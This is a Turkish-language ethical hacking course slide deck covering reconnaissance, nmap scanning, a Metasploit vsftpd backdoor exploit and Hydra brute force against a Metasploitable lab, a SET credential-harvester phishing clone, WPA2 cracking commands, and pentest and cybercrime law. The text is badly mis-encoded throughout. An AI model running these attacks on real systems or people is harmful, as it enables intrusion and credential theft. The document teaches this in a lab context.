際際滷

際際滷Share a Scribd company logo
S聴BER SALDIRI YNTEMLER聴,
B聴LG聴 TOPLAMA ARALARI
9.Hafta
Sald脹r脹 Aamalar脹
 Bilgi Toplama(Veri)
 Haz脹rl脹k(A巽脹kl脹k Tespiti)
 Sald脹r脹(A巽脹kl脹k S旦m端rme)
 Eriim
 Yetki Y端kseltme
 聴zleri Silmek
Sald脹r脹 MetodolojisiBilgiToplama
Aktif
Pasif
Tarama Zafiyet Dorulama Sisteme S脹zma
Yetki Y端kseltme
Kendini Gizleme
Arka Kap脹 B脹rakma
Sald脹r脹 Y旦ntem ve eitleri
 Sistem tespiti (Fingerprinting)
 Zafiyetlerin Tespit Edilmesi
 Sistem ve Uygulamaya Y旦nelik Sald脹r脹lar脹
 A G端venliine Y旦nelik Sald脹r脹lar
 Sosyal M端hendislik Sald脹r脹lar脹
Bilgi Toplama Y旦ntemleri
 Pasif
 Sistemle dorudan iletiime ge巽meden yap脹lan
bilgi toplama ilemleridir.
 Aktif
 Sistemle dorudan iletiime ge巽erek yap脹lan bilgi
toplama ilemleridir.
Pasif Bilgi Toplama Ara巽lar脹
 Whois/DNS(whois, Ripe, vb.)
 Arama motorlar脹 (Google, Bing, vb.)
 Dnsstuff (dnsstuff.com)
 Netcraft (netcraft.com)
 Ariv siteleri (archive.org)
 IP Location (iplocation.net)
 Shodan (shodan.io)
 Bilgi toplama ara巽lar脹
Aktif Bilgi Toplama Ara巽lar脹
 Ping
 Nslookup
 Traceroute
 dig
 dnsmap
 Dmitry
 Fierce
 The Harvester
 Maltego
 Foca
 hping
 Nmap
 Centralops.net
 Pentest-tools.com
 Exploit-db.com
(Google Hacking Database)
 Robtex.com
 Mxtoolbox.com
 Dnsstuff.com
whois
 Kali -> Terminal -> #whois cu.edu.tr
whois.com / whois.com.tr
Google
Siber Guvenlik ve Etik Hhacking -2-
Siber Guvenlik ve Etik Hhacking -2-
Siber Guvenlik ve Etik Hhacking -2-
Siber Guvenlik ve Etik Hhacking -2-
Siber Guvenlik ve Etik Hhacking -2-
Siber Guvenlik ve Etik Hhacking -2-
Siber Guvenlik ve Etik Hhacking -2-
Siber Guvenlik ve Etik Hhacking -2-
Ping
host
nslookup
Traceroute
dig
dnsenum
dnsmap
dmitry
The Harvester
Maltego
Metasploit ile eposta toplama
Foca
hping
wafw00f
nmap
Siber Guvenlik ve Etik Hhacking -2-
Siber Guvenlik ve Etik Hhacking -2-
Siber Guvenlik ve Etik Hhacking -2-
Siber Guvenlik ve Etik Hhacking -2-
Siber Guvenlik ve Etik Hhacking -2-
Siber Guvenlik ve Etik Hhacking -2-
Siber Guvenlik ve Etik Hhacking -2-
Siber Guvenlik ve Etik Hhacking -2-
TARAMA, ZAF聴YET TESP聴T聴 VE
PAROLA KIRMA
10. Hafta
Tarama
 Nmap
 Host, versiyon, tcp, ping, protocol, vb..
 Hping3
 Port, flag(paket), udp, vb..
 Zmap
 Netcat
 Nbtscan
nmap
 Nmap (Network Mapper)
 sT (3l端 el s脹k脹ma)
 sS (Syn taramas脹)
 sA (Ack firewall varm脹)
 P 80 (ping olmadan 80.port)
 sU (Udp portlar)
 V (versiyonlar)
 O (iletim sistemi tahmini)
 nmap -sS -sV --open -n 192.168.1.1
Zafiyet Tespiti
 Network
 Nessus, OpenVas, INFRA
 Web
 Nikto, Acunetix, Burp Suite, Owasp Zap
 Metasploit
 Metasploitable 2
Parola K脹rma
 Hydra
 Medusa
 Mimikatz
 Ncrack
hydra -L userlist -P passlist 192.168.0.1 protokol
Uygulama 1
 Metasploitable 2
 Nmap
 vsftpd
 Metasploit
 Exploit
Metasploitable
Sanal makine olarak 巽温鉛脹岳脹姻脹霞看姻顎噛..
Metasploitable
Kullan脹c脹 ad脹 ve parola, msfadmin
Metasploitable
ifconfig komutu ile IP bilgisini 旦reniyoruz..
Eriim Kontrol端
Kali sanal makinam脹zdan Metasploitable2 sanal
makinam脹za ping ile eriim salad脹脹m脹z脹 kontrol
ediyoruz. (Metasploitable脹n IPsini 旦renmitik)
Nmap ile Tarama
Nmap arac脹 ile sanal makinam脹z脹n taramas脹n脹
balat脹yoruz.
(Tarad脹脹m脹z makine, metasploitable sanal makinesi)
Nmap Tarama Sonu巽lar脹
Tarama sonucu zaafiyetler bar脹ndan sistemde a巽脹k olan
servisler, portlar脹 ve s端r端m bilgilerine eriiyoruz.
Nmap Sonucu Deerlendirme
聴lk s脹rada bulunan ftp servisinin vsftpd s端r端m端ne ilikin
bir zafiyet s旦m端rme arac脹 varm脹 kontrol ediyoruz.
Metasploit
Metasploit arac脹n脹 a巽脹yoruz..
msfconsole veya M simgesi ile..
Metasploit
Metasploit i巽erisinde vsftpd ile ilgili arama yap脹yoruz..
search vsftpd
Bir adet backdoor buluyoruz.
Metasploit
Bulduumuz exploiti kullanmaya ve se巽eneklerini
g旦rmeye bal脹yoruz.
use exploit/unix/ftp/vsftpd_234_backdoor
show options
Metasploit
Ard脹ndan RHOST ile IP tan脹ml脹yoruz, payload
se巽eneklerine bak脹yoruz.
set RHOST 192.168.72.131
show payloads
Metasploit
Payload脹 kullanmak i巽in tan脹ml脹yoruz ve se巽eneklerine
bak脹yoruz.
set payload cmd/unix/interact
show payloads
Metasploit
RPORT ile port tan脹mlamas脹n脹 yap脹yoruz.
set RPORT 21
Metasploit
Tan脹mlad脹脹m脹z bilgiler dorultusunda payload脹n
巽al脹t脹r脹lmas脹 i巽in balat脹yoruz.
exploit
veya
Run
Metasploit
Exploit 巽al脹t脹 baar脹l脹 bir ekilde payload makinan脹n
shell oturumunu a巽t脹.. Art脹k sistemdeyiz
Uygulama 2
 Metasploitable 2
 Nmap
 ssh
 hydra
Metasploitable
Hedef sistem olarak belirlenen sanal
makinam脹z脹n IP bilgisini 旦rendikten sonra Nmap
taramas脹 ile erimek istediimiz servisleri
belirliyoruz. (telnet ve ssh)
Hydra ile Parola K脹rma Ata脹
Servislerin kullan脹c脹 ad脹 ve parolas脹n脹 tekil olarak tahmin
ile denemek i巽in Hydray脹 kullan脹yoruz. (telnet ve ssh)
Hydra
Kullan脹c脹 ad脹 ve parola listeleri oluturup onlar脹 Hydra ile
deniyoruz.
Hydra
Liste denemelerimizin sonu巽lar脹.. (telnet ve ssh)
Uygulama 3
 Man in the Middle
 Sosyal m端hendislik
Sosyal M端hendislik
Site clone y旦ntemi ile kiileri orijinal sitelerin
benzer zararl脹 kopyalar脹na ulat脹r脹p kullan脹c脹 ad脹
ve parola bilgilerini alma ama巽l脹 bir sosyal
m端hendislik sald脹r脹 旦rnei oluturmak i巽in;
Se-Toolkit kullan脹yoruz.
Sosyal M端hendislik
SET a巽脹l脹yor..
Sosyal M端hendislik
Sosyal M端hendislik Ata脹n脹 壊艶巽庄霞看姻顎噛..
Sosyal M端hendislik
Web site ata脹n脹 壊艶巽庄霞看姻顎噛..
Sosyal M端hendislik
Kimlik Dorulay脹c脹(Credential Harvester) ata脹n脹 壊艶巽庄霞看姻顎噛..
Sosyal M端hendislik
Site klonlamay脹 壊艶巽庄霞看姻顎噛..
Sosyal M端hendislik
Klon site i巽in IP adresi belirleyip, Ger巽ek sitenin url
bilgisini yaz脹yoruz.(klonu yap脹lacak site)
Sosyal M端hendislik
Klonumuz haz脹r.. Art脹k taray脹c脹 ile IP adresine gelen
kullan脹c脹n脹n bilgilerini alabiliriz..
Sosyal M端hendislik
Taray脹c脹 a巽脹p IP adresini giriyoruz..
Sosyal M端hendislik
Klonumuz kar脹m脹zda..
Sosyal M端hendislik
Kullan脹c脹 bilgilerini girdiinde ve giri yapt脹脹nda sanki
yanl脹 yaz脹lm脹 gibi orijinal siteye g旦nderiyor..
Sosyal M端hendislik
Orijinal site..
Sosyal M端hendislik
Kullan脹c脹n脹n girdii bilgiler art脹k elimizde
Kullan脹c脹 ad脹 ve parola..
WEB GVENL聴聴 SALDIRI VE SAVUNMA
YNTEM-ARALARI (TEM聴Z KOD)
11. Hafta
Web
 TCP/IP
 Http protokol端
 Web Server
HTTP Metodlar脹
Y旦ntem A巽脹klama
GET Sunucudan bir kayna脹 ister
HEAD GET gibi kullan脹l脹r ama sadece Header getirir ve i巽erik getirmez
POST Sunucuda bulunan verinin i巽eriini deitirmesini ister
PUT Sunucuda bir kaynak yaratmas脹n脹 veya baka kaynak ile deitirmesini ister
DELETE Sunucuda bulunan bir kayna脹 silmesini ister
CONNECT SSL balant脹lar脹n HTTP balant脹lar脹 i巽inden ge巽mesini salar
OPTIONS Sunucudan bir kaynakla ilgili ge巽erli y旦ntemleri ister
TRACE Sunucunun istek Headerlar脹n脹 geri g旦ndermesini ister
HTTP Durum Kodlar脹
 1xx: Bilgi mesajlar脹.
 2xx: Baar脹l脹 istek yan脹tlar脹.
 3xx: 聴stemciyi baka bir kaynaa y旦nlendiren
yan脹tlar.
 4xx: Bir hata bar脹nd脹ran isteklere kar脹 端retilen
yan脹tlar.
 5xx: Sunucu taraf脹nda istek kar脹lanmaya
巽al脹脹l脹rken bir hata al脹nd脹脹na ilikin yan脹tlar.
404Page not found
Http Header Bilgileri
 Request
 Cf-Connecting-Ip
 Cookie
 Accept-Language
 Referer
 Accept
 User-Agent
 Upgrade-Insecure-Requests
 Cf-Visitor
 X-Forwarded-Proto
 Cf-Ray
 X-Forwarded-For
 Cf-Ipcountry
 Accept-Encoding
 Connection
 Host
 Response
 Content-Base
 Content-Length
 Cache-Control
 Content-Type
 Date
 eTag
 Last-Modified
 Location
 Server
 Set-Cookie
 X-Powered-By
 WWW-Authenticate
 Connection
Bir web sitesinin header bilgilerini g旦rmek i巽in; https://headers.cloxy.net/ adresinden
yararlan脹labilir.
Siber Guvenlik ve Etik Hhacking -2-
Sunucu Teknolojileri
 Scripting dilleri (PHP, VBScript, Perl)
 Web uygulama platformlar脹 (ASP.NET, Java)
 Web sunucular脹 (Apache, IIS, ngix)
 Veritabanlar脹 (MS-SQL, Oracle, MySQL)
 ve dier destekleyici servislerdir (File Systems, SOAP
tabanl脹 web servisleri, dizin servisleri)
 聴stemci g旦nderileri
 URL sorgu stringleri
 HTTP cookieleri
 POST metodu ile yap脹lan istek mesaj g旦vdeleri
Web Lab Uygulama Yaz脹l脹mlar脹
 DVWA
 Mutillidae
 SQLol
 Hackxor
 The BodgeIt Store
 Exploit KB / exploit.co.il Vulnerable Web App
 WackoPicko
 WebGoat
 OWASP Hackademic Challenges Project
 XSSeducation
Damn Vulnerable Web App (DVWA)
 Web uygulama g端venlii alan脹nda kendini gelitirmek
isteyenler i巽in PHP ile oluturulmu i巽inde belli web
zafiyetlerini bar脹nd脹ran bir eitim sistemidir.
 Bar脹nd脹rd脹脹 Zafiyetler:
 Brute Force
 Command Execution
 CSRF
 File Inclusion
 SQL Injection
 Upload
 XSS Reflected
 XSS Stored
DVWS Uygulamalar脹
 Sanal makine Metasploitable2
 Firefox taray脹c脹s脹
KABLOSUZ A GVENL聴聴
12. Hafta
Kablosuz A G端venlii
 Open Security
 WEP
 WPA
 RSN
 RADIUS / WPA-RADIUS
 Wireless Gateway
 Firmalara 旦zel 巽旦z端mler
Siber Guvenlik ve Etik Hhacking -2-
Kablosuz A Sald脹r脹 eitleri
(IEEE 802.11x Tehditleri)
 Eriim Kontrol端 Sald脹r脹lar脹 (Access Control Attacks)
 Gizlilik Sald脹r脹lar脹 (Confidentiality Attacks)
 B端t端nl端k Dorulama Sald脹r脹lar脹(Integrity Attacks)
 Kimlik Dorulama Sald脹r脹lar脹 (Authentication Attacks)
 Kullan脹labilirlik sald脹r脹lar脹 (Availability Attacks)
Eriim Kontrol端 Sald脹r脹lar脹
(Access Control Attacks)
 Kablosuz Alar脹 Tarama (War Driving)
 Yetkisiz Eriim Noktas脹 (Rogue Access Point)
 Mac Adres Sahtecilii (Mac Spoofing)
 Ip Adresi Yan脹ltma (Ip Spoofing)
 G端venli Olmayan Aa Balanma (Adhoc Associations)
 802.1x Radius Cracking
Gizlilik Sald脹r脹lar脹
(Confidentiality Attacks)
 Gizli Dinleme (Eavesdropping)
 Wep Anahtar脹 K脹rma (Wep Key Cracking)
 Ap zerinde Sahte Portal al脹t脹rmak (Ap Phishing)
 Ortadaki Adam Sald脹r脹s脹 (Man In The Middle)
B端t端nl端k Dorulama Sald脹r脹lar脹
(Integrity Attacks)
 802.11 Paketi P端sk端rtme (Frame Injection)
 802.11 Veri Tekrarlama (802.11 Data Replay)
 802.1x EAP Tekrarlama (802.1x EAP Replay)
 802.1x Radius Tekrarlama (802.1x Radius Replay)
Kimlik Dorulama Sald脹r脹lar脹
(Authentication Attacks)
 Shared Key Guessing
 PSK Cracking
 802.1x Password Guessing
 Application Login Theft
 Domain Login Cracking
 802.1x LEAP Cracking
 802.1x EAP Downgrade
Kullan脹labilirlik Sald脹r脹lar脹
(Availability Attacks)
 Servis Reddi Sald脹r脹lar脹 (DoS Attacks)
 AP Theft
 Queensland DoS
 802.11 Beacon Flood
 802.11 Deauthenticate Flood
Sald脹r脹 Ara巽lar脹
 airmon-ng
 airodump-ng
 aireplay-ng
 aircrack-ng
 reaver
 Netstumbler /
MiniStumbler
 Kismet
 Airodump
 Aircrack
Sald脹r脹 Y旦ntemi
 airmon-ng start wlan0 wifi monitor mod
 airodump-ng wlan0mon 巽evredeki alar bilgi
 airodump-ng wlan0mon BSSID ile paket toplar
 aireplay-ng deauth 100 -e Test wlan0mon
istemciyi yeniden balanmaya zorlama (el s脹k脹ma)
 aircrack-ng WPA2-01.cap -w /wordlist/liste.txt  o
paketlere kaba kuvvet sald脹r脹s脹 ile parola bulma.
Siber Guvenlik ve Etik Hhacking -2-
Siber Guvenlik ve Etik Hhacking -2-
Siber Guvenlik ve Etik Hhacking -2-
Siber Guvenlik ve Etik Hhacking -2-
Siber Guvenlik ve Etik Hhacking -2-
Savunma
 Kablosuz a eriim noktalar脹n脹n yama ve
firmware g端ncellemesinin yap脹lmas脹
 WPA/WPA2 ile g端巽l端 parola ilkesi uygulanmal脹
 M端mk端nse trafik VPN ile t端nelleyerek
ifrelenmeli
 M端mk端nse Mac filter kullan脹lmal脹
SIZMA TESTLER聴(PENTEST)VE
S聴BER GVENL聴K STANDARTLARI
13. Hafta
S脹zma Testi
 Penetration Test
 PenTest
 S脹zma Testi
 Yaz脹l脹m G端venlik Testi
 Siber G端venlik Tatbikat脹
 Siber Tatbikat
gibi isimlerle de an脹lmaktad脹r.
S脹zma Testi
G端venlik uzmanlar脹 taraf脹ndan ger巽ekletirilen,
k旦t端 ama巽l脹 bir sald脹rgan脹n sisteme verebilecei
zararlar脹 raporlamak ve 旦nceden savunma
旦nlemleri almak amac脹 ile oluturulan sald脹r脹
denemelerinin tamam脹d脹r. (Burlu, 2010)
S脹zma testlerinin amac脹, kurululara sistemlerini
daha g端venli hale getirmelerinde yard脹mc脹
olmakt脹r.
S脹zma Testleri
 Beyaz apkal脹 hacker,
 Etik hacker,
 Pentester,
 S脹zma Testi Uzman脹,
gibi isimler ad脹 alt脹nda ifade edilen siber g端venlik
uzmanlar脹 taraf脹ndan ger巽ekletirilmektedir.
Uzmanlar belirli kalite standartlar脹na g旦re
巽al脹maktad脹rlar.
S脹zma Testi = Zafiyet Analizi mi?
 S脹zma Testi Zafiyet Analizi
 Ayn脹 ey deildir.
 S脹zma testi, yaz脹l脹m ve y旦ntemler kullanarak
hedef sistemlere s脹zma giriimleridir.
 Zafiyet Analizi, otomatize ara巽lar kullanarak
sistem g端venliinin teknik a巽脹dan incelenmesi
ve raporlanmas脹d脹r.
Zafiyetten > S脹zma Testine
 Belirlenen biliim sistemlerindeki mant脹k hatalar脹
ve zafiyetleri tespit ederek, s旦z konusu g端venlik
a巽脹kl脹klar脹n脹n k旦t端 niyetli kiiler taraf脹ndan
istismar edilmesini 旦nlemek ve sistemleri daha
g端venli hale getirmek maksad脹yla, yetkili kiiler
taraf脹ndan ve yasal olarak ger巽ekletirilen
g端venlik testleridir.
 Pentest 巽al脹malar脹ndaki as脹l ama巽, zafiyeti tespit
etmekten 旦te ilgili zafiyeti sisteme zarar
vermeyecek ekilde istismar etmek ve yetkili
eriimler elde etmektir.
S脹zma Testi Y旦ntemleri
 Hedefe yap脹lacak testin t端r端 uzmana verilecek
yetki ve bilgiye g旦re deiiklik g旦stermektedir.
 Beyaz Kutu S脹zma Testleri (White Box)
 Siyah Kutu S脹zma Testleri (Black Box)
 Gri Kutu S脹zma Testleri (Gray Box)
eklinde 端巽 gruba
ay脹rmak m端mk端nd端r.
Beyaz Kutu
 G端venlik testi ekibi, sistemin kendisi ve arka
planda 巽al脹an ilave teknolojiler hakk脹nda tam
bilgi sahibidir.
 Test yap脹lan Firmaya daha b端y端k fayda salar.
 Hata ve zafiyetleri bulmak kolaylaaca脹ndan
bunlara tedbir al脹nma s端resi de azalacakt脹r.
 Sistemin zarar g旦rme riski 巽ok azd脹r ve maliyet
olarak da en az maliyetli oland脹r.
Siyah Kutu
 Balang脹巽ta g端venlik testi yap脹lacak sistemle ilgili
bir bilgi yoktur.
 Tamamen bilinmeyen bir sistem ile ilgili bilgi
toplanacak ve testler yap脹lacakt脹r.
 Bu y旦ntemde test ekibinin sistem ile ilgili bilgi
d端zeyi hi巽 olmad脹脹ndan, yanl脹l脹kla sisteme zarar
verme ihtimalleri de y端ksektir.
 Bilgi toplama safhas脹 olduk巽a zaman al脹r.
 S端re bak脹m脹ndan en uzun s端ren yakla脹m tarz脹d脹r.
Gri Kutu
 Sistem ile ilgili bilgiler mevcuttur.
 rnein; IP adres listesi, sunucu sistem ile ilgili versiyon
bilgisi vb.
 Bilgiler g端venlik testi yapacak ekibe 旦nceden
salan脹r.
 Black Box yakla脹m脹na g旦re daha k脹sa zaman al脹r.
 Kontrol端 ve testi istenen IP adresleri belli
olduundan sistemin, istem d脹脹 zarar g旦rme
ihtimali de azalm脹 olur.
Metodoloji
 nceden belirlenmi ve denenmi, kal脹plam脹
standartlar haline gelmi kural ve y旦ntemler.
 OWASP (Open Web Application Project)
 OSSTIMM (The Open Source Sec脹rity Testing Methodology Manual)
 ISSAF (Information Systems Security Assessment Framework)
 NIST (SP800-15)
S脹zma Testi Metodolojisi
 Bilgi toplama
 A Haritalama
 Zay脹fl脹k Tarama
 Sisteme S脹zma
 Yetki Y端kseltme
 Baka Alara S脹zma
 Eriimleri Koruma
 聴zleri Temizleme
 Raporlama
Resim Kayna脹 : CRYPTTECH
Kapsam Belirleme, Bilgi Toplama, Keif ve Tarama, Zafiyet Taramas脹 ve Analizi, 聴stismar Etme, Yetki Y端kseltme, Yay脹lma, Bilgi-Dok端man Toplama, 聴zleri Temizleme, Raporlama
S脹zma Testi eitleri
 聴巽 A
 D脹 A
 Web
 Kablosuz
 Mobil
 Sosyal M端hendislik
 Dos/DDoS
Resim Kayna脹: CRYPTTECH
Pentest Rapor rnekleri
1. https://www.offensive-security.com/reports/sample-penetration-testing-report.pdf
2. https://www.sans.org/reading-room/whitepapers/bestprac/writing-penetration-testing-report-
33343
3. http://www.niiconsulting.com/services/security-assessment/NII_Sample_PT_Report.pdf
Standartlar脹 Oluturan Kurulular
 IEEE
 ICANN
 ISO/IEC
 ETSI
 IETF
 NIST
 PCI SSC
 TSE
Standartlar
 ISO 27001:2013 Bilgi G端venlii Y旦netim Sistemi
 CC
 COBIT
 COSO
 ITIL
 CMMI
 TSE
ISO 27001
 Varl脹klar脹n s脹n脹鍖and脹r脹lmas脹,
 Gizlilik, b端t端nl端k ve eriebilirlik kriterlerine g旦re varl脹klar脹n
deerlendirilmesi,
 Risk analizi yap脹lmas脹,
 Risk analizi 巽脹kt脹lar脹na g旦re uygulanacak kontrollerin belirlenmesi,
 Dok端mantasyon oluturulmas脹,
 Kontrollerin uygulanmas脹,
 聴巽 tetkik,
 Kay脹tlar脹n tutulmas脹,
 Y旦netimin g旦zden ge巽irmesi,
 Belgelendirme
eklindedir.
Sertifikalar
 CompTIA  Security+
 CEH (Certified Ethical Hacker)
 LPT (Licensed Penetration Tester)
 OSCP (Offensive Security Certified Professional)
 CCSP (Cisco Certified Security)
 CISSP (Certified Information Systems Security Professional)
 CPTE (Certified Penetration Testing Engineer)
 ECSA (EC-Council Certified Security Analyst)
 GIAC (GPEN, GWAPT, GXPN)
 CEPT (Certified Expert Penetration Tester)
Windows Pentest Box
 Windows ile Pentest
ara巽lar脹
 https://pentestbox.org
S聴BER GVENL聴聴N HUKUK聴
BOYUTU VE B聴L聴聴M HUKUKU
14. Hafta
Biliim Hukuku
 Say脹sal bilginin payla脹m脹n脹 konu alan hukuk
dal脹d脹r.
 聴nternetin kullan脹m脹na ilikin yasal 巽er巽eveyi
belirleyen internet hukukunu kapsamaktad脹r.
 Youn olarak Ceza hukuku, Genel hukuk ve
Fikir Sanat Eserler Kanunun Hukuk kurallar脹
a巽脹s脹ndan ele al脹n脹r.
 https://www.tbb.org.tr/Content/Upload/Dokuman/801/BILISIM_HUKUKU.pdf
Biliim Su巽lar脹
 Yetkisiz ve izinsiz eriim (Hacking)
 Verilere Y旦nelik Su巽lar
 Biliim Alar脹na Y旦nelik Su巽lar
 Sanal Tecav端z
 Biliim Ortam脹nda Cinayet
 Tehdit ve antaj
 Hakaret ve s旦vme
 Taciz ve Sabotaj
 Doland脹r脹c脹l脹k
 H脹rs脹zl脹k
 Sahtekarl脹k
 Manip端lasyon
 Pornografi
 R旦ntgencilik
 Siber Ter旦rizm
 Siber Propaganda
Biliim 聴le 聴lgili Kanunlar
 T端rk Ceza Kanunu (Biliim Su巽lar脹) (5237)
 T端rk Ceza Kanunu (Biliim Vas脹tal脹 Su巽lar)
 Fikir ve Sanat Eserleri Kanunu (FSEK-5846) (71,72,73)
 Ceza Muhakemesi Kanunu (5271-Madde 134)
 Ka巽ak巽脹l脹kla M端cadele Kanunu (4926 - Madde 12)
 5651 Say脹l脹 Kanun (聴nternet Ortam脹nda Yap脹lan Yay脹nlar脹n
D端zenlenmesi ve Bu Yay脹nlar Yoluyla 聴lenen Su巽larla M端cadele Edilmesi
Hakk脹nda Kanun)
 5809 Say脹l脹 Elektronik Haberleme Kanunu
 5070 Say脹l脹 Elektronik 聴mza Kanunu
5237 say脹l脹 T端rk Ceza Kanununun
Biliim Su巽lar脹na 聴likin H端k端mleri
 Madde 243
 Madde 244
 Madde 245
 Madde 124
 Madde 132
 Madde 133
 Madde 134
 Madde 135
 Madde 136
 Madde 137
 Madde 138
 Madde 140
 Madde 142
 Madde 158
5237 say脹l脹 T端rk Ceza Kanununun
Biliim Su巽lar脹na 聴likin H端k端mleri
 Madde 243: Biliim Sistemine Girme
 Madde 244: Sistemi Engelleme, Bozma, Verileri
Yok Etme veya Deitirme
 Madde 245: (5377 Say脹l脹 Kanunun 27. Maddesiyle Deiik):
Sahte Banka Veya Kredi Kart脹 retimi ve Kullan脹m脹
 Madde 246: T端zel kiiler hakk脹ndaki tedbirler
5237 say脹l脹 T端rk Ceza Kanununun
Biliim Vas脹tal脹 Su巽lar脹na 聴likin H端k端mleri
 Madde 124: Haberlemenin Engellenmesi
 Madde 132: Haberlemenin Gizliliini 聴hlal
 Madde 133: Kiiler Aras脹ndaki Konumalar脹n Dinlenmesi ve Kayda Al脹nmas脹
 Madde 134: zel Hayat脹n Gizliliini 聴hlal
 Madde 135: Kiisel Verilerin Kaydedilmesi
 Madde 136: Verileri Hukuka Ayk脹r脹 Olarak Verme veya Ele Ge巽irme
 Madde 137: Nitelikli Haller
 Madde 138: Verileri Yok Etmeme
 Madde 140: T端zel Kiiler Hakk脹nda G端venlik Tedbiri Uygulanmas脹
 Madde 142: Nitelikli H脹rs脹zl脹k
 Madde 158: Nitelikli Doland脹r脹c脹l脹k
 Madde 226: M端stehcenlik
Fikir ve Sanat Eserleri Kanunu (5846)
 Madde 71  Manevi Haklara Tecav端z.
 Yaz脹l脹m脹 kamuya sunma hakk脹,Yaz脹l脹m sahibinin
ad脹n脹 belitme hakk脹, Deiiklik yap脹lmamas脹 hakk脹
 Madde 72  Mali Haklara Tecav端z.
 Deitirmek, kopyalamak, 巽oaltmak yaymak,
ticaret konusu yapmak, arac脹l脹k etmek, su巽tur.
 Madde 73  Dier Su巽lar
Ceza Muhakemesi Kanunu (5271)
 Madde 134  Bilgisayarlarda, bilgisayar programlar脹nda ve k端t端klerinde arama,
kopyalama ve elkoyma.
 (1) Bir su巽 dolay脹s脹yla yap脹lan soruturmada, baka surette delil elde etme imk但n脹n脹n
bulunmamas脹 halinde, Cumhuriyet savc脹s脹n脹n istemi 端zerine 端phelinin kulland脹脹
bilgisayar ve bilgisayar programlar脹 ile bilgisayar k端t端klerinde arama yap脹lmas脹na,
bilgisayar kay脹tlar脹ndan kopya 巽脹kar脹lmas脹na, bu kay脹tlar脹n 巽旦z端lerek metin h但line
getirilmesine h但kim taraf脹ndan karar verilir.
 (2) Bilgisayar, bilgisayar programlar脹 ve bilgisayar k端t端klerine ifrenin 巽旦z端lememesinden
dolay脹 girilememesi veya gizlenmi bilgilere ula脹lamamas脹 halinde 巽旦z端m端n
yap脹labilmesi ve gerekli kopyalar脹n al脹nabilmesi i巽in, bu ara巽 ve gere巽lere elkonulabilir.
ifrenin 巽旦z端m端n端n yap脹lmas脹 ve gerekli kopyalar脹n al脹nmas脹 halinde, elkonulan cihazlar
gecikme olmaks脹z脹n iade edilir.
 (3) Bilgisayar veya bilgisayar k端t端klerine elkoyma ilemi s脹ras脹nda, sistemdeki b端t端n
verilerin yedeklemesi yap脹l脹r.
 (4) 聴stemesi halinde, bu yedekten bir kopya 巽脹kar脹larak 端pheliye veya vekiline verilir ve
bu husus tutanaa ge巽irilerek imza alt脹na al脹n脹r. (5) Bilgisayar veya bilgisayar k端t端klerine
elkoymaks脹z脹n da, sistemdeki verilerin tamam脹n脹n veya bir k脹sm脹n脹n kopyas脹 al脹nabilir.
Kopyas脹 al脹nan veriler k但脹da yazd脹r脹larak, bu husus tutanaa kaydedilir ve ilgililer
taraf脹ndan imza alt脹na al脹n脹r
Ka巽ak巽脹l脹kla M端cadele Kanunu (4926)
 Madde 12  G端mr端k idarelerinde sahte beyan
ve belge.
 G端mr端k idarelerinde ilem g旦rmedii halde ilem
g旦rm端 gibi herhangi bir belge veya beyanname
d端zenleyenler veya bu su巽lar脹 biliim yoluyla
ileyenler hakk脹nda T端rk Ceza Kanununun evrakta
sahtekarl脹k ve biliim alan脹ndaki su巽larla ilgili
h端k端mlerinde belirtilen cezalar bir kat art脹r脹larak
uygulan脹r.
T端rk Ceza Kanunu (243)
T端rk Ceza Kanunu Madde 243 (Biliim sistemine girme)
(1) Bir biliim sisteminin b端t端n端ne veya bir k脹sm脹na,
hukuka ayk脹r脹 olarak giren ve orada kalmaya devam
eden kimseye bir y脹la kadar hapis veya adl樽 para cezas脹
verilir.
(2) Yukar脹daki f脹krada tan脹mlanan fiillerin bedeli kar脹l脹脹
yararlan脹labilen sistemler hakk脹nda ilenmesi h但linde,
verilecek ceza yar脹 oran脹na kadar indirilir.
(3) Bu fiil nedeniyle sistemin i巽erdii veriler yok olur veya
deiirse, alt脹 aydan iki y脹la kadar hapis cezas脹na
h端kmolunur.
T端rk Ceza Kanunu (244)
T端rk Ceza Kanunu Madde 244 (Sistemi engelleme, bozma, verileri yok etme veya deitirme)
(1) Bir biliim sisteminin ileyiini engelleyen veya bozan kii, bir y脹ldan be
y脹la kadar hapis cezas脹 ile cezaland脹r脹l脹r.
(2) Bir biliim sistemindeki verileri bozan, yok eden, deitiren veya eriilmez
k脹lan, sisteme veri yerletiren, var olan verileri baka bir yere g旦nderen
kii, alt脹 aydan 端巽 y脹la kadar hapis cezas脹 ile cezaland脹r脹l脹r.
(3) Bu fiillerin bir banka veya kredi kurumuna ya da bir kamu kurum veya
kuruluuna ait biliim sistemi 端zerinde ilenmesi halinde, verilecek ceza
yar脹 oran脹nda art脹r脹l脹r.
(4) Yukar脹daki f脹kralarda tan脹mlanan fiillerin ilenmesi suretiyle kiinin
kendisinin veya bakas脹n脹n yarar脹na haks脹z bir 巽脹kar salamas脹n脹n baka
bir su巽 oluturmamas脹 h但linde, iki y脹ldan alt脹 y脹la kadar hapis ve bebin
g端ne kadar adl樽 para cezas脹na h端kmolunur.
GENEL TEKRAR
VE F聴NALE HAZIRLIK
15. Hafta

More Related Content

What's hot (20)

Siber G端venlik ve Etik Hacking Sunu - 9
Siber G端venlik ve Etik Hacking Sunu - 9Siber G端venlik ve Etik Hacking Sunu - 9
Siber G端venlik ve Etik Hacking Sunu - 9
Murat KARA
Siber G端venlik ve Etik Hacking Sunu - 4
Siber G端venlik ve Etik Hacking Sunu - 4Siber G端venlik ve Etik Hacking Sunu - 4
Siber G端venlik ve Etik Hacking Sunu - 4
Murat KARA
Siber G端venlik ve Etik Hacking Sunu - 13
Siber G端venlik ve Etik Hacking Sunu - 13Siber G端venlik ve Etik Hacking Sunu - 13
Siber G端venlik ve Etik Hacking Sunu - 13
Murat KARA
Beyaz apkal脹 Hacker CEH Eitimi - B旦l端m 7, 8, 9
Beyaz apkal脹 Hacker CEH Eitimi - B旦l端m 7, 8, 9Beyaz apkal脹 Hacker CEH Eitimi - B旦l端m 7, 8, 9
Beyaz apkal脹 Hacker CEH Eitimi - B旦l端m 7, 8, 9
BGA Cyber Security
Siber G端venlik ve Etik Hacking Sunu - 11
Siber G端venlik ve Etik Hacking Sunu - 11Siber G端venlik ve Etik Hacking Sunu - 11
Siber G端venlik ve Etik Hacking Sunu - 11
Murat KARA
Nmap101 Eitim Sunumu - Nmap Kullan脹m K脹lavuzu
Nmap101 Eitim Sunumu - Nmap Kullan脹m K脹lavuzuNmap101 Eitim Sunumu - Nmap Kullan脹m K脹lavuzu
Nmap101 Eitim Sunumu - Nmap Kullan脹m K脹lavuzu
Mehmet Caner K旦rolu
G端venlik Sistemlerini Atlatma ve Al脹nacak Dersler
